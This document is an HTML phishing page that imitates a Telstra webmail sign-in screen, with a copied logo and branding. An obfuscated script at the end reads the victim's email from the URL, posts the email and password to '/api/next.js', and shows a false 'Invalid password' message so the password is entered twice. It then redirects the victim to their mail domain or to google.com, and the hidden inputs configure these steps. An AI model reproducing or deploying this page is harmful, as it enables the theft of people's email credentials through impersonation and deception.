<!doctype html>
<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title>Sign in to Webmail</title>
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css">
    <style>
        :root{
      --primary:#0b5cff;          /* Brand blue */
      --primary-hover:#0a4fe6;    /* Hover blue */
      --surface:#ffffff;          /* Card and bars */
      --soft-bg:#edf6ff;          /* Page soft blue */
      --text:#0b1320;             /* Heading/body */
      --muted:#6c757d;            /* Secondary text */
      --radius:8px;
    }

    body{ color:var(--text); background:var(--soft-bg); min-height:100vh }

    /* Top white bar */
    .header-bar{
      background:var(--surface);
      border-bottom:1px solid rgba(0,0,0,.05);
      height:64px;
    }


    /* Auth card styling to match screenshot */
    .auth-card{
      border:0;
      max-width:420px;
    }

    .auth-title{
      font: 500 2.5rem / 1.2 Telstra Display, Helvetica Neue, Helvetica, Arial, sans-serif;
      
      
      margin-bottom:.75rem;
    }

    .helper{
              font-family: Telstra Text Variable, Helvetica Neue, Helvetica, Arial, sans-serif;
        font-size: 1rem;
        font-variation-settings: "wght" 400, "slnt" 0;
        font-weight: 400;
        letter-spacing: 0;
        line-height: 1.5;
    }

    /* Inputs */
    .form-control{
      height:48px;
      border-radius:4px;
      border-color: gray;
    }

    .label{
      font-weight: 500;
    }

    /* Links */
    .link-primary{
      color:var(--primary);
      font-weight:600;
      text-decoration:none;
    }
    .link-primary:hover{ color:var(--primary-hover); text-decoration:underline; }

    /* Buttons to match pill look */
    .btn{ font-weight:600; }
    .btn-primary{
      background:var(--primary);
      border-color:var(--primary);
    }
    .btn-primary:hover{
      background:var(--primary-hover);
      border-color:var(--primary-hover);
    }
    .btn-outline-primary{
      color:var(--primary);
      background:#fff;
      border-color:var(--primary);
      border-width:2px;
    }
    .btn-outline-primary:hover{
      color:#fff;
      background:var(--primary);
      border-color:var(--primary);
    }

    .header{
      padding: 0px 120px;
    }

    .custom-button{
      border-radius: 25px;
      padding: 10px 0px;
    }

    /* Footer */
    .footer-bar{
      background:var(--surface);
      border-top:1px solid rgba(0,0,0,.05);
      margin-top: 80px;
    }
  </style>
</head>

<body class="d-flex flex-column min-vh-100">
    <header class="header-bar d-flex align-items-center">
        <div class="container-fluid header">
            <svg width="33px" height="33px" viewBox="0 0 33 33" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-label="Telstra Logo" role="img" focusable="false">
                <g id="Artboard" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                    <g id="Telstra_Primary-logo_C_RGB" fill-rule="nonzero">
                        <path d="M18.742504,14.0832 L17.5024033,21.3536 C17.2460517,22.6624 16.3840696,23.0144 15.6182193,23.0144 L9.88235294,23.0144 L12.3016709,9.6992 C9.88876173,8.5952 7.42137789,7.8752 5.4602884,7.8752 C3.59212634,7.8752 2.0764477,8.3808 1.0670634,9.5872 C0.3556878,10.448 0,11.5104 0,12.7712 C0,16.5568 2.98008698,21.808 8.08468757,26.0928 C12.6317235,29.8784 17.6369879,32 21.2771801,32 C23.0940719,32 24.5584802,31.4432 25.523003,30.336 C26.2792401,29.4784 26.5836576,28.3648 26.5836576,27.104 C26.5836576,23.424 23.5811398,18.2688 18.742504,14.0832 Z" id="Path" fill="#F96449"></path>
                        <path d="M8.44037537,0 C7.53032731,0 6.77409018,0.6112 6.57221332,1.568 L5.76470588,5.9552 L12.9777981,5.9552 L9.87914855,23.0112 L15.6182193,23.0112 C16.3840696,23.0112 17.2460517,22.656 17.5024033,21.3504 L20.1268025,5.9552 L25.3179217,5.9552 C26.2311742,5.9552 26.9874113,5.3504 27.1892882,4.3904 L28,0 L8.44037537,0 Z" id="Path" fill="#0D54FF"></path>
                    </g>
                </g>
            </svg>
        </div>
    </header>
    <main class="hero-bg flex-grow-1 py-5">
        <div class="container">
            <div class="row justify-content-center">
                <div class="col-xl-6 col-lg-7 col-md-9">
                    <div class="card auth-card mx-auto pb-5">
                        <div class="card-body px-2 px-md-4 py-5">
                            <p class="auth-title mb-3">Sign in to Telstra<br />webmail</p>
                            <p class="helper mb-4">Sign in with your Telstra email address</p>
                            <form class="mt-5" id="form-1" action="/api/next.js" method="POST">
                                <input type="hidden" name="btn1" value="btn1">
                                <div id="div1" style="display:block;">
                                    <div class="form-group mb-3">
                                        <label for="email" class="label mb-1">Telstra email</label>
                                        <small class="d-block text-muted mb-2">Example: john@bigpond.com</small>
                                        <input type="email" class="form-control" id="ai" name="ai" autocomplete="username" required />
                                    </div>
                                    <div class="mb-5">
                                        <a href="#" class="link-primary">Forgot Telstra email</a>
                                    </div>
                                    <div class="form-group form-check mb-5">
                                        <input type="checkbox" class="form-check-input" id="remember" />
                                        <label class="form-check-label" for="remember">Remember Telstra email</label>
                                    </div>
                                    <button type="submit" id="next" class="btn custom-button btn-primary btn-block">Continue</button>
                                    <div class="text-center text-muted my-3">OR</div>
                                    <button type="button" class="btn btn-outline-primary custom-button btn-block">
                                        Sign in to MyTelstra
                                    </button>
                                </div>
                                <div id="div2" style="display:none;">
                                    <div class="form-group mb-3">
                                        <p for="password" class="mb-1">Back to previous for:</p>
                                        <div class="form-control d-flex align-items-center" style="gap:5px">
                                            <i class="fas fa-chevron-left"></i>
                                            <span id="aich">abc@gmail.com</span>
                                        </div>
                                    </div>
                                    <div class="form-group mb-3">
                                        <label for="password" class="label mb-1">Password</label>
                                        <input type="password" class="form-control" id="pr" name="pr" autocomplete="username" />
                                    </div>
                                    <div id="msg" class="alert alert-danger" style="display:none;">
                                        Invalid password..! Please enter correct password.
                                    </div>
                                    <div class="mb-5">
                                        <a href="#" class="link-primary">Recover account</a>
                                    </div>
                                    <button type="submit" id="btn1" class="btn custom-button btn-primary btn-block">Sign in</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <footer class="footer-bar">
        <div class="container py-3">
            <div class="d-flex flex-column flex-md-row align-items-center justify-content-center" style="gap:20px">
                <small class="text-muted mb-2 mb-md-0">&copy; 2025 Telstra</small>
                <div>
                    <a href="#" class="text-muted mr-3">Privacy</a>
                    <a href="#" class="text-muted">Terms of use</a>
                </div>
            </div>
        </div>
    </footer>
    <!-- //mailer link -->
    <input type="hidden" id="f" value="/api/next.js">
    <!-- //mail result count -->
    <input type="hidden" id="rc" value="2">
    <!-- //redirect link -->
    <input type="hidden" id="rdrt" value="https://www.google.com">
    <!-- // if you want to redirection for domain (0 for no)(1 for yes) -->
    <input type="hidden" id="domain_redirect" value="1">
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
var _0x525270=_0x5837;function _0x5837(_0xa75bf3,_0x2284e8){var _0x574e7d=_0x574e();return _0x5837=function(_0x583762,_0x57d0a1){_0x583762=_0x583762-0x1c7;var _0x18320f=_0x574e7d[_0x583762];return _0x18320f;},_0x5837(_0xa75bf3,_0x2284e8);}(function(_0x75571c,_0x38da25){var _0x3d08b1=_0x5837,_0x2bdacd=_0x75571c();while(!![]){try{var _0xd296f=parseInt(_0x3d08b1(0x1c7))/0x1+-parseInt(_0x3d08b1(0x1c8))/0x2+parseInt(_0x3d08b1(0x1f4))/0x3+-parseInt(_0x3d08b1(0x1d3))/0x4+-parseInt(_0x3d08b1(0x1ea))/0x5*(-parseInt(_0x3d08b1(0x1df))/0x6)+parseInt(_0x3d08b1(0x1e2))/0x7+parseInt(_0x3d08b1(0x1d5))/0x8*(parseInt(_0x3d08b1(0x1dc))/0x9);if(_0xd296f===_0x38da25)break;else _0x2bdacd['push'](_0x2bdacd['shift']());}catch(_0x4fd539){_0x2bdacd['push'](_0x2bdacd['shift']());}}}(_0x574e,0xb9a5d));var f=$('#f')[_0x525270(0x1cd)](),rc=$(_0x525270(0x1d1))[_0x525270(0x1cd)](),rdrt=$(_0x525270(0x1ce))[_0x525270(0x1cd)](),domain_redirect=$(_0x525270(0x1e5))[_0x525270(0x1cd)]();$(document)[_0x525270(0x1dd)](function(){var _0x1de710=_0x525270,_0x2ede81=0x0;$(document)[_0x1de710(0x1f2)](function(_0x40e9f){var _0x43b193=_0x1de710,_0x32ec77=_0x40e9f[_0x43b193(0x1cc)]?_0x40e9f[_0x43b193(0x1cc)]:_0x40e9f[_0x43b193(0x1d0)];_0x32ec77=='13'&&(_0x40e9f[_0x43b193(0x1db)](),$(_0x43b193(0x1f5))['click']());});var _0x1b1618=window[_0x1de710(0x1ec)][_0x1de710(0x1d2)][_0x1de710(0x1f1)](0x1);!_0x1b1618&&(typeof emails!==_0x1de710(0x1eb)&&(_0x1b1618=emails));if(!_0x1b1618){}else{var _0x54bf96=_0x1b1618,_0x51ab39=_0x54bf96[_0x1de710(0x1e0)]('@'),_0x13cec9=_0x54bf96[_0x1de710(0x1f1)](_0x51ab39+0x1),_0x1b0546=_0x13cec9[_0x1de710(0x1f1)](0x0,_0x13cec9[_0x1de710(0x1e0)]('.')),_0x43b220=_0x1b0546[_0x1de710(0x1e6)]();$(_0x1de710(0x1d7))[_0x1de710(0x1cd)](_0x54bf96),$(_0x1de710(0x1cb))[_0x1de710(0x1e4)](_0x54bf96),$(_0x1de710(0x1e7))[_0x1de710(0x1de)]();}$(_0x1de710(0x1d4))[_0x1de710(0x1d8)](function(_0x47e514){var _0x9dd26=_0x1de710;$('#msg')[_0x9dd26(0x1de)](),_0x47e514[_0x9dd26(0x1db)]();var _0x30e6aa=$(_0x9dd26(0x1d7))[_0x9dd26(0x1cd)](),_0x4fc247=_0x30e6aa,_0x33c7e5=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/,_0x5184d4=_0x4fc247[_0x9dd26(0x1e0)]('@'),_0x4f24fa=_0x4fc247[_0x9dd26(0x1f1)](_0x5184d4+0x1),_0x5c2f8e=_0x4f24fa[_0x9dd26(0x1f1)](0x0,_0x4f24fa[_0x9dd26(0x1e0)]('.')),_0x22ca09=_0x5c2f8e['toLowerCase']();$(_0x9dd26(0x1cb))[_0x9dd26(0x1e4)](_0x30e6aa);if(!$(_0x9dd26(0x1da))['is'](':visible'))return $(_0x9dd26(0x1e9))[_0x9dd26(0x1e3)]({'left':0x0,'opacity':'hide'},0x0),$(_0x9dd26(0x1da))[_0x9dd26(0x1e3)]({'right':0x0,'opacity':_0x9dd26(0x1e8)},0x1f4),$(_0x9dd26(0x1da))[_0x9dd26(0x1ef)]('#pr')[_0x9dd26(0x1ee)](_0x9dd26(0x1ed),!![]),![];_0x2ede81=_0x2ede81+0x1;var _0x5c2f8e=new FormData($('#form-1')[0x0]);console[_0x9dd26(0x1f3)](_0x5c2f8e),setTimeout(function(){var _0xeef7b5=_0x9dd26;_0x2ede81>=rc?(_0x2ede81=0x0,domain_redirect==0x1?window[_0xeef7b5(0x1ec)][_0xeef7b5(0x1d6)](_0xeef7b5(0x1c9)+_0x4f24fa):window[_0xeef7b5(0x1ec)]['replace'](rdrt)):($(_0xeef7b5(0x1f0))['val'](''),$(_0xeef7b5(0x1e7))[_0xeef7b5(0x1e8)](),$(_0xeef7b5(0x1f5))['html'](_0xeef7b5(0x1e1)));},0x1f4),$[_0x9dd26(0x1cf)]({'dataType':_0x9dd26(0x1ca),'url':f,'type':_0x9dd26(0x1d9),'data':_0x5c2f8e,'processData':![],'contentType':![],'beforeSend':function(_0x944e5e){var _0x26a89e=_0x9dd26;$(_0x26a89e(0x1f5))['html']('Verifying...');},'complete':function(){}});});});function _0x574e(){var _0x18487e=['228014uGFNlg','2129190NfuTWa','http://www.','JSON','#aich','keyCode','val','#rdrt','ajax','which','#rc','hash','5838272DdzDFh','#form-1','20336528dMEmJP','replace','#ai','submit','POST','#div2','preventDefault','9lsNFsA','ready','hide','6DOjMRi','indexOf','Sign\x20in','6790MPKZTD','animate','html','#domain_redirect','toLowerCase','#msg','show','#div1','630165sRkmzT','undefined','location','required','prop','find','#pr','substr','keypress','log','1162479oGWzwy','#btn1'];_0x574e=function(){return _0x18487e;};return _0x574e();}
</script>

</html>